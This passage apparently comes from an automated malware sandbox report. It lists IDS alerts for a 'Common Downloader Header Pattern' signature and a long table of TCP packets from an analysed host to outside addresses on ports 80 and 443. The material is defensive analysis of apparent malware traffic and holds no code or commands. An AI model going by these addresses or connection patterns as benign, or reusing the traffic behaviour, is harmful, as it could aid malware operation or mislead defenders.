                                                                                          2024-10-17T09:44:47.156550+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449750193.122.130.080TCP
                                                                                          2024-10-17T09:44:47.884709+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449761188.114.96.3443TCP
                                                                                          2024-10-17T09:44:48.606725+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449762193.122.130.080TCP
                                                                                          2024-10-17T09:44:50.190043+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449772188.114.96.3443TCP
                                                                                          2024-10-17T09:44:50.953371+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449776193.122.130.080TCP
                                                                                          2024-10-17T09:44:51.672838+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449777188.114.96.3443TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 17, 2024 09:44:41.258191109 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:41.263148069 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:41.263237000 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:41.263462067 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:41.268224001 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:41.933653116 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:41.942300081 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:41.947067976 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.101335049 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.156481981 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:42.168595076 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.168628931 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.168816090 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.180532932 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.180548906 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.794625044 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.794744968 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.799406052 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.799424887 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.799899101 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.843991041 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.877314091 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:42.919413090 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.014651060 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.014764071 CEST44349740188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.014915943 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.040291071 CEST49740443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.259685993 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:43.265156984 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.421777010 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.424310923 CEST49743443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.424345016 CEST44349743188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.424417973 CEST49743443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.424820900 CEST49743443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.424834967 CEST44349743188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.436011076 CEST44349743188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.448786020 CEST49744443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.448812962 CEST44349744188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.449001074 CEST49744443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.449254036 CEST49744443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.449269056 CEST44349744188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.460860968 CEST44349744188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.468987942 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:43.473447084 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:43.478300095 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.640470028 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.642431021 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.642468929 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.642548084 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.643079996 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:43.643090010 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:43.687731981 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.252046108 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.252130032 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:44.254122972 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:44.254129887 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.254410028 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.255839109 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:44.303414106 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.393215895 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.393318892 CEST44349745188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.393373013 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:44.393934965 CEST49745443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:44.399807930 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.401170969 CEST4974680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.405854940 CEST8049739193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.405971050 CEST4973980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.406223059 CEST8049746193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.406297922 CEST4974680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.406837940 CEST4974680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.411432981 CEST8049746193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.411508083 CEST4974680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.411669970 CEST4974680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.411763906 CEST8049746193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.412013054 CEST4974780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.416460037 CEST8049746193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.416516066 CEST8049746193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.416774988 CEST8049747193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.416836023 CEST4974780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.416907072 CEST4974780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.421787977 CEST8049747193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.422102928 CEST8049747193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.431045055 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.435920954 CEST8049748193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:44.435990095 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.436109066 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:44.440903902 CEST8049748193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.108935118 CEST8049748193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.110831022 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.110882998 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.111248016 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.111824989 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.111840010 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.160535097 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.179936886 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.184740067 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.185509920 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.185509920 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.190587044 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.723381042 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.725452900 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.725476027 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.848067045 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.853065014 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.857961893 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.872292042 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.872411966 CEST44349749188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.872481108 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.873028994 CEST49749443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:45.877505064 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.879239082 CEST4975180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.883124113 CEST8049748193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.883476019 CEST4974880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.884078026 CEST8049751193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.885001898 CEST4975180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.885001898 CEST4975180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.889920950 CEST8049751193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.890306950 CEST8049751193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.891197920 CEST4975280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.896111012 CEST8049752193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.896193981 CEST4975280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.896285057 CEST4975280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.901109934 CEST8049752193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.902955055 CEST8049752193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.908272982 CEST4975380192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.913152933 CEST8049753193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.913223982 CEST4975380192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.913324118 CEST4975380192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.918112040 CEST8049753193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.918358088 CEST8049753193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.918987989 CEST4975480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.923827887 CEST8049754193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.923897982 CEST4975480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.923994064 CEST4975480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.928869963 CEST8049754193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.929025888 CEST8049754193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.932791948 CEST4975580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.940920115 CEST8049755193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.940989017 CEST4975580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.941097021 CEST4975580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.945895910 CEST8049755193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.946317911 CEST8049755193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.947094917 CEST4975680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.952033043 CEST8049756193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.952097893 CEST4975680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.952192068 CEST4975680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.957505941 CEST8049756193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.957869053 CEST8049756193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.961611032 CEST4975780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.967601061 CEST8049757193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.967672110 CEST4975780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.967854023 CEST4975780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.972819090 CEST8049757193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.973360062 CEST8049757193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.975718021 CEST4975880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.981053114 CEST8049758193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.981125116 CEST4975880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.981415987 CEST4975880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:45.986327887 CEST8049758193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:45.986507893 CEST8049758193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.012114048 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.024321079 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.024350882 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.024626970 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.025353909 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.025371075 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.062834978 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:46.105798006 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.105834007 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.105921030 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.114033937 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.114056110 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.721648932 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.721735001 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.723401070 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.723411083 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.723839998 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.765886068 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.796534061 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.843405008 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.871345043 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.871421099 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.874133110 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.874146938 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.874453068 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.876219988 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:46.923404932 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.931680918 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.931771040 CEST44349760188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.931832075 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.935471058 CEST49760443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:46.939168930 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:46.944078922 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.101924896 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.104226112 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.104273081 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.104371071 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.104846001 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.104867935 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.113048077 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.113126040 CEST44349759149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.113214016 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:47.115742922 CEST49759443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:47.156549931 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.743443012 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.745614052 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.745636940 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.884732962 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.884826899 CEST44349761188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.885268927 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.885742903 CEST49761443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:47.890045881 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.891664982 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.895293951 CEST8049750193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.896405935 CEST4975080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.896485090 CEST8049762193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:47.900268078 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.900388002 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:47.905133963 CEST8049762193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.560842991 CEST8049762193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.563282013 CEST49763443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.563311100 CEST44349763188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.563368082 CEST49763443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.563853979 CEST49763443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.563869953 CEST44349763188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.592446089 CEST44349763188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.592523098 CEST49763443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.606724977 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.647648096 CEST49763443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.647675991 CEST44349763188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.650079012 CEST49764443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.650118113 CEST44349764188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.650182962 CEST49764443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.650938034 CEST49764443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:48.650949955 CEST44349764188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.662790060 CEST44349764188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.668375015 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.669409037 CEST4976580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.673511982 CEST8049762193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.673578024 CEST4976280192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.674253941 CEST8049765193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.674312115 CEST4976580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.674422979 CEST4976580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.679171085 CEST8049765193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.679595947 CEST8049765193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.682012081 CEST4976680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.687108040 CEST8049766193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.687167883 CEST4976680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.687974930 CEST4976680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.692322016 CEST8049766193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.692377090 CEST4976680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.692456961 CEST4976680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.694958925 CEST8049766193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.696412086 CEST4976780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.697272062 CEST8049766193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.697488070 CEST8049766193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.701282024 CEST8049767193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.701350927 CEST4976780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.701416016 CEST4976780192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.706279039 CEST8049767193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.706448078 CEST8049767193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.707413912 CEST4976880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.712272882 CEST8049768193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.712346077 CEST4976880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.712449074 CEST4976880192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.717179060 CEST8049768193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.717408895 CEST8049768193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.722894907 CEST4976980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.727878094 CEST8049769193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.727941990 CEST4976980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.728034019 CEST4976980192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.732784033 CEST8049769193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.739737988 CEST8049769193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.740816116 CEST4977080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.747802019 CEST8049770193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.747881889 CEST4977080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.753704071 CEST8049770193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.753752947 CEST4977080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.768398046 CEST4977080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.768714905 CEST4977080192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.773200989 CEST8049770193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.774547100 CEST8049770193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.777575970 CEST4977180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.782448053 CEST8049771193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:48.782510996 CEST4977180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.782608032 CEST4977180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:48.787377119 CEST8049771193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:49.437829971 CEST8049771193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:49.439701080 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:49.439727068 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:49.439897060 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:49.440148115 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:49.440169096 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:49.484839916 CEST4977180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.045763969 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.045886993 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.047674894 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.047687054 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.047971964 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.049886942 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.095412970 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.190053940 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.190157890 CEST44349772188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.190561056 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.192364931 CEST49772443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.194386005 CEST4977180192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.195765018 CEST4977480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.199522018 CEST8049771193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.199654102 CEST4977180192.168.2.4193.122.130.0
